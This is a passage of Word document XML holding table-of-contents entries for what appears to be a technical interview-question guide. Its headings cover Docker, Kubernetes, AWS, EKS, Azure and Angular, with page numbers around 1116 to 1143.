              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1116</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54F0ED11" w14:textId="378DF36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2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use of Docker?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308321 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1117</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39C3884F" w14:textId="6AC41EC2" w:rsidR="00012799" w:rsidRDefault="00012799">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308322" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kubernetes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308322 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1119</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D51098E" w14:textId="37EF606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2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Kubernetes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308323 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1119</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E851AB" w14:textId="43239CF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2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Kubernetes Architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308324 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1119</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1391F919" w14:textId="6A23F0A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2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Kubernetes Services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308325 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1121</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="620DDDBE" w14:textId="63E0609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2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Kubernetes Secret?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308326 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1124</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49009B90" w14:textId="15A9DE40" w:rsidR="00012799" w:rsidRDefault="00012799">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308327" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AWS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308327 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="375CBF7A" w14:textId="4D972BD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2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AWS services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308328 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C2A6ED4" w14:textId="50DA8E9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2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cloud computing?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308329 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02EAAE1C" w14:textId="1B80FAE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3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services provided by cloud computing?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308330 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00261BA7" w14:textId="30F2EEF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3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deploy service to AWS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308331 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1130</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50FF80FA" w14:textId="43DBD08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3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ich services have you used?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308332 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1131</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7503E734" w14:textId="0966403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3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are different services in EKS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308333 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1132</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31C9B785" w14:textId="35AA783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3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benefit of Serverless services? Is EKS serverless?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308334 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22922616" w14:textId="17A768DD" w:rsidR="00012799" w:rsidRDefault="00012799">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308335" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Azure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308335 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1135</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BCBD961" w14:textId="094FE80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3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Azure Services?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308336 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1135</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="365F51B4" w14:textId="0282E708" w:rsidR="00012799" w:rsidRDefault="00012799">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308337" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Angular</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308337 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1137</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01CE3CB6" w14:textId="73D842B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3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are the components in the Angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308338 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1137</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FFBCF2F" w14:textId="4660BAB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3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pass data from components in Angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308339 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1138</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A481957" w14:textId="6B7861D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4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does the component.ts file contain in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308340 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1139</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B00F23A" w14:textId="6364352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4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two-way data binding in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308341 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E5969D3" w14:textId="3FA65AE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4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make backend calls in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308342 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="173D7376" w14:textId="5A59749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4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authguard in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308343 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1142</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B832500" w14:textId="6091849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4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interpolation in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308344 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1143</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="612F2E24" w14:textId="59F78C9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4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create components in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
